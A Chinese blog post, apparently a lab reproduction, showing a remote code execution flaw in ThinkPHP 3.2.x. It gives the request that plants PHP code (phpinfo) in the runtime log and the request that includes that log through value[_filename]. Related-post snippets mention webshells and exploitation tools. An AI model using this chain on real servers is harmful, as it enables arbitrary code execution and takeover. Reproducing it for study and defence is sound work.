ThinkPHP3.2.x 代码执行漏洞

已于 2022-10-19 09:13:28 修改
阅读量1.8k 收藏
点赞数 1
分类专栏: ThinkPHP 文章标签: 安全 web安全
于 2022-10-19 09:09:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guishengyx/article/details/127400658
版权

ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。

参考:【漏洞通报】ThinkPHP3.2.x RCE漏洞通报

访问网站抓包

将攻击代码写入日志中

/index.php?m=--><?=phpinfo();?>

访问

\Application\Runtime\Logs\Common\yy_mm_dd.log

可以看到日志内容

ymd指年月日

 构造攻击请求

/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_10_19.log

AlienStar
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp3.2.x 代码执行
qq_17622203的博客
03-21 3075
1.因为是靶场,所以没有waf之类的东西,也就不涉及到绕过,免杀之类的操作。 2.文中红色的字体是要注意根据实际情况写的。 3.mysql写shell的几种方法:写入mysql_通过MySQL写入webshell的几种方式_weixin_39872872的博客-CSDN博客 Log记录目录:若开启debug模式日志会到:\Application\Runtime\Logs\Home\下若未开启debug模式日志会到:\Application\Runtime\Logs\Common\下 访问页面时抓包,
ThinkPHP漏洞系列/2.x 任意代码执行漏洞
jammny
11-17 1374
漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 影响版本: Thinkphp2.x系列以及ThinkPHP 3.0版.
漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x
10-14 2166
thinkphp-命令执行】日志包含
vulfocus——thinkphp3.2.x代码执行
m0_62063669的博客
10-01 1944
ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。22_10_01是复现的日期,根据自己的时间做调整。
ThinkPHP 2.x/3.0 漏洞复现
Knsec
06-04 1789
ThinkPHP 2.x/3.0漏洞复现
漏洞复现】ThinkPHP3.2.x RCE 漏洞复现
m0_46344990的博客
04-10 4172
目录 一,漏洞描述 二,漏洞发现 三、漏洞利用 本人是一个小白,目前大三计算机专业,出于对网络安全的热爱自学了好久。在学习网络安全的路上简直坎坷,有时候迷茫有时候又找到了方向,全凭自己摸索。啊,真希望有个老师傅能带带我。这也是我第一次复现漏洞,还不会thinkphp框架,就先看视频自学了几天,才把这个漏洞琢磨透。。。结合网上其他文章修改总结了一下。要是有错误或者不合理的地方,也请多多担待。 一,漏洞描述 描述: ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框...
ThinkPHP 漏洞利用工具
Websec
05-18 6180
当看到ThinkPHP十年磨一剑的提示,那么今天这里分享的工具就可以派上用场了,一键检测ThinkPHP全版本漏洞。 01、TPscan 一键ThinkPHP漏洞检测,基于Python3,命令行检测,集成了14个常见的ThinkPHP框架漏洞检测插件。 github项目地址: https://github.com/Lucifer1993/TPscan 02、Aazhen-V3.1 支持ThinkPHP 2.x RCE,Thinkphp5 5.0.22/5.1.29RCE,ThinkPHP5
ThinkPHP3.2 框架sql注入漏洞分析(2018-08-23)
Fly_鹏程万里
12-11 6303
0x00 前言 北京时间 2018年8月23号11:25分 星期四,tp团队对于已经停止更新的thinkphp 3系列进行了一处安全更新,经过分析,此次更新修正了由于select(),find(),delete()方法可能会传入数组类型数据产生的多个sql注入隐患。 0x01 漏洞复现 下载源码: git clone https://github.com/top-think/thinkp...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
ThinkPHP_3.2.zip_thinkPHP3.2_thinkphp3.2..3
09-14
1. MVC模式:ThinkPHP3.2采用模型-视图-控制器架构,将业务逻辑、数据处理和界面展示分离,使代码更加清晰,易于维护。 2. 快速路由:强大的路由系统使得URL管理更加灵活,支持动态路由和RESTful风格的API设计。 3. ...
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
thinkphp3.2.x新增图片上传缩略图裁剪类
06-26
调用方式很简单 get_sc($cover_id,[$width=180,$height=auto,$cut]) @param $cover_id 图片ID___ @param $width 宽度___ @param $height 高___ @param $cut 是否切割 默认不切割___ 直接返回新图片的url ...
ThinkPHP 3.2.x RCE漏洞复现
qq_43697234的博客
07-20 6968
ThinkPHP 3.2.x RCE漏洞复现 漏洞介绍 ThinkPHP3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。 漏洞复现 复现环境:phpstudy+php7.3.4+ThinkPHP3.2.3完整版+windows10 一、 搭建环境: 在ThinkPHP的Application\Home\Controller\IndexController.class.php 目录
[框架漏洞]Thinkphp系列漏洞【截至2020-07-20】
不忘初心,护天下安全!
07-21 8976
一、Thinkphp ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,因为受到众多开发人员的喜爱,其在市场的应用规模很大,自然也引起了众多安全人员的注意。因此在这里,对相关漏洞进行归纳和总结。 指纹为:X-Powered-By: ThinkPHP 二、安全漏洞 1.ThinkPHP 5.0.23远程代码执行 参考:http://zone.secevery.com/article/1165 介绍:Thinkphp在实现框架中的核心类Request的method方法实现了表单请求
【vulhub漏洞复现】Thinkphp 2.x 任意代码执行
RexHa的博客
02-28 2476
当preg_replace使用了/e模式,可以导致代码执行。该函数的正则规则和目标字符可以由用户进行输入。preg_replace 函数在匹配到符号正则的字符串时,会将替换字符(第二个参数)当做代码执行。在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由,导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
thinkphp3.2.3 代码执行
weixin_46801402的博客
11-02 1059
thinkphp3.2.3 代码执行
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 845
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
最新发布
亚信安全官方账号的博客
07-19 464
一站式云安全托管限时试用 开启全能高效攻防
thinkphp3.2.x rce
12-18
ThinkPHP是一个开源的PHP开发框架,它的版本3.2.x是一个老版本,存在远程命令执行(RCE)漏洞。这个漏洞允许攻击者通过构造恶意请求来执行任意的系统命令,从而获得对应用服务器的完全控制权限。 这个漏洞的原因是在ThinkPHP 3.2.x版本的核心代码中没有对用户的输入进行充分的过滤和校验。攻击者可以利用这个漏洞执行各种恶意操作,比如上传恶意文件、修改数据库内容或者获取系统敏感信息等。 为了利用这个漏洞,攻击者需要构造一个特殊的请求,其中包含可执行的系统命令。然后将这个请求发送到受影响的应用程序的漏洞点上。当应用程序在处理这个请求时,会将其中的系统命令当作可执行代码执行,最终导致攻击者获取对应用服务器的控制权限。 为了修复这个漏洞,用户可以升级到最新版本的ThinkPHP框架。在最新版本中,开发者已经修复了这个漏洞,并加强了对用户输入的过滤和校验。此外,用户还可以根据自己的需求对应用程序进行进一步的安全加固,比如限制上传文件的类型和大小,对用户输入进行严格的过滤和校验等。 总之,ThinkPHP 3.2.x版本存在远程命令执行漏洞,攻击者可以通过构造恶意请求来执行任意的系统命令。为了修复这个漏洞,用户可以升级到最新版本的ThinkPHP框架,并加强应用程序的安全加固措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值